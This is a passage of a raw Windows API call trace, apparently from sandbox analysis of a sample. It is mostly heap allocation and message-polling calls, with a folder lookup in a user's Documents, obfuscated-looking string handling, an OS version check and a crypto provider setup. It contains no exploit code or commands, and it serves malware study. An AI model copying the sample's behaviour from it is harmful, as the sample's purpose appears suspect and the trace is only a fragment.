(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0222.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0222.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0222.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0222.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0222.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0222.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.250] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/zxF6sHlM0JaF", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x282d2360, ftCreationTime.dwHighDateTime=0x1d5d750, ftLastAccessTime.dwLowDateTime=0xa72068e0, ftLastAccessTime.dwHighDateTime=0x1d5ca93, ftLastWriteTime.dwLowDateTime=0xa72068e0, ftLastWriteTime.dwHighDateTime=0x1d5ca93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zxF6sHlM0JaF", cAlternateFileName="ZXF6SH~1")) returned 0x9e2138 [0222.250] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0222.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.251] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.251] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0222.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.255] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0222.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.255] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.256] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.256] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0222.256] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.257] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0222.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0222.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.257] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0222.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.257] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0222.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.258] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0222.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0222.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.258] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.258] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.258] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.258] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.258] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0222.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0222.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0222.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0222.259] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7ba28) returned 1 [0222.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.259] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0222.259] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.259] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0222.259] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.259] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.259] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.260] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.260] CharUpperBuffW (in: lpsz="SSA5C00800A45", 